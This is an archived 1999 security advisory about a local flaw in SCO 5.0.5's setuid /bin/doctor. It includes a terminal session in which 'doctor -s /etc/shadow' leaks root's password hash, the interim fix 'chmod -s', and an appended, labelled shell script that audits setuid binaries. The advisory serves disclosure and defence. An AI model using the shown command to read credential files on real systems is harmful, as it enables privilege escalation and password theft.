SCO 5.0.5 /bin/doctor local root compromise

From: Brock Tellier (btellierat_private)
Date: Fri Sep 03 1999 - 15:20:17 PDT


    Greetings,
    
    
    INFO:
     There is a local root compromise in SCO 5.0.5's /bin/doctor 2.0.0e2 and
    probably others.  By supplying a doctor script file you can read the
    first partial line of any file on the system (good enough for
    /etc/shadow).  Example:
    
    scobox:/bin$ id
    uid=136(btellier),200(users)
    scobox:/bin$ uname -a
    SCO_SV scobox 3.2 5.0.5 i386
    scobox:/bin$ doctor -V
    doctor 2.0.0e 2
    scobox:/bin$ doctor -s /etc/shadow
    doctor: WARNING User message: invalid command name "root:xbfOLR0ekXN/o:10656::"
    scobox:/bin$
    
    And so on.
    
    FIX:
     Just chmod -s until SCO comes out with a fix.  Although I certainly
    won't be changing it back to suid root anytime soon.  If a hole like
    this exists, there are undoubtedly countless more lurking within.
    
    Brock Tellier
    Systems Administrator
    Webley Systems
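As an added example, not part of the post above: a small POSIX shell audit an admin could run after reading it, which lists setuid files under given directories, applies the interim `chmod -s` fix to a named binary, and confirms the bit is really gone. The demo works on a constructed scratch file named `doctor` in a temp directory, not on the real /bin/doctor.

```shell
#!/bin/sh
# Added example (not from the advisory): audit setuid binaries and apply
# the interim fix the post recommends, then re-check the result.

# is_setuid PATH: succeed when PATH carries the setuid bit (POSIX `test -u`).
is_setuid() {
    [ -u "$1" ]
}

# list_setuid DIR...: print every setuid regular file under the given
# directories, one path per line, so an unexpected entry such as
# /bin/doctor stands out in a review.
list_setuid() {
    find "$@" -type f -perm -4000 2>/dev/null
}

# strip_setuid PATH: clear the setuid and setgid bits (what `chmod -s` does)
# and succeed only if the setuid bit is verifiably gone afterwards.
strip_setuid() {
    chmod u-s,g-s "$1" || return 1
    if is_setuid "$1"; then
        return 1
    fi
    return 0
}

# demo: constructed stand-in for /bin/doctor in a scratch directory;
# shows the audit listing before and after the fix.
demo() {
    d=$(mktemp -d) || return 1
    f="$d/doctor"          # constructed file, not the real binary
    : > "$f"
    chmod 4755 "$f"        # give it the setuid bit, as /bin/doctor shipped
    echo "setuid files before fix:"
    list_setuid "$d"
    strip_setuid "$f" || { rm -rf "$d"; return 1; }
    echo "setuid files after fix:"
    list_setuid "$d"
    rm -rf "$d"
}

demo
```

Run `list_setuid /bin /usr/bin /etc` as root to get the full inventory of setuid binaries on a box; anything not expected to need root is a candidate for the same `chmod -s` treatment.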
    
    



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:01:46 PDT